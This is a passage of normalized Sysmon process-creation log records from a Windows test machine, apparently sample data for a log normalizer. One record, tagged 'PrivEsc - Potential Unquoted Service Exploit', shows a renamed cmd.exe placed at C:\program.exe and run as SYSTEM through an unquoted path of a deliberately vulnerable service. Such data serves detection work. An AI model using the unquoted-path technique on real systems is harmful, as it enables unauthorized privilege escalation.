Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"sihost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"sihost.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b767-5ea4-0000-00209bd30100}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d39b\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A72247134CA39DA0B1F706F6B339DC912C0EE0D3,MD5=F6A576DCC3EA8F62B8818434B163D25B,SHA256=FDF2362A69C542996A8AC84B938DE62CA97AC209762171D2F8B6B543D3A966D0,IMPHASH=D79FA753A3003DE97EDFC038DF32C136\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010dcdf0000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1240\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s UserManager\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b767-5ea4-0000-00209bd30100", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "119707", "object.process.cmdline": "sihost.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\sihost.exe", "object.process.guid": "747f3d96-b767-5ea4-0000-0010fe2e0200", "object.process.hash.imphash": "D79FA753A3003DE97EDFC038DF32C136", "object.process.hash.md5": "F6A576DCC3EA8F62B8818434B163D25B", "object.process.hash.sha1": "A72247134CA39DA0B1F706F6B339DC912C0EE0D3", "object.process.hash.sha256": "FDF2362A69C542996A8AC84B938DE62CA97AC209762171D2F8B6B543D3A966D0", "object.process.id": "3752", "object.process.meta": "Description:Shell Infrastructure Host | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "sihost.exe", "object.process.original_name": "sihost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s UserManager", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b765-5ea4-0000-0010dcdf0000", "object.process.parent.id": "1240", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1075 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "119707", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:19.844Z", "type": "raw", "uuid": "dce5ce6a-f275-4831-bcd1-9ef1fa94d3c7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.4656529Z\"},\"EventRecordID\":\"27650\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.525\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010baa10100}\"},{\"Name\":\"ProcessId\",\"text\":\"3044\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalService -p -s WdiServiceHost\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalService -p -s WdiServiceHost", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010baa10100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "3044", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.525Z", "type": "raw", "uuid": "49942192-9705-41fb-b2ea-bc49d5e7f820"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0960491Z\"},\"EventRecordID\":\"27644\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.357\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-00104a8d0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2900\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-00104a8d0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2900", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.357Z", "type": "raw", "uuid": "1b11c6bb-3200-4221-8557-2c08bc5b7bf4"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0868370Z\"},\"EventRecordID\":\"27641\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.329\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010038a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2876\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s WpnService\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s WpnService", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010038a0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2876", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.329Z", "type": "raw", "uuid": "a605fca2-3c86-465e-bf9c-8beb3fb08030"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0807172Z\"},\"EventRecordID\":\"27636\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - Potential Unquoted Service Exploit\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.317\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010e7880100}\"},{\"Name\":\"ProcessId\",\"text\":\"2856\"},{\"Name\":\"Image\",\"text\":\"C:\\\\program.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.592 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"Cmd.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\Program Files\\\\vulnsvc\\\\mmm.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential Unquoted Service Exploit", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "c:\\Program Files\\vulnsvc\\mmm.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010e7880100", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "2856", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.317Z", "type": "raw", "uuid": "cfe86c74-2c29-4618-8dbf-fb8a14b34f3a"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0793247Z\"},\"EventRecordID\":\"27635\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.316\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010d4880100}\"},{\"Name\":\"ProcessId\",\"text\":\"2848\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wlms\\\\wlms.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows License Monitoring Service\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"wlms.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wlms\\\\wlms.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=42D56EA9DF9576E2193499EE25C27244EAC4ED6B,MD5=4E72A0A91ED9A811FA75A6D8EEC24DE3,SHA256=487A3B61FEFDDC758B2455DF2C8E666D3FCC4E75D8C0A6B56D0AD2732F9F3C48,IMPHASH=C4858787B32BE55BB0085C7B777727C2\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\wlms\\wlms.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\wlms\\wlms.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010d4880100", "object.process.hash.imphash": "C4858787B32BE55BB0085C7B777727C2", "object.process.hash.md5": "4E72A0A91ED9A811FA75A6D8EEC24DE3", "object.process.hash.sha1": "42D56EA9DF9576E2193499EE25C27244EAC4ED6B", "object.process.hash.sha256": "487A3B61FEFDDC758B2455DF2C8E666D3FCC4E75D8C0A6B56D0AD2732F9F3C48", "object.process.id": "2848", "object.process.meta": "Description:Windows License Monitoring Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "wlms.exe", "object.process.original_name": "wlms.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\wlms\\", "object.process.version": "10.0.17763.1 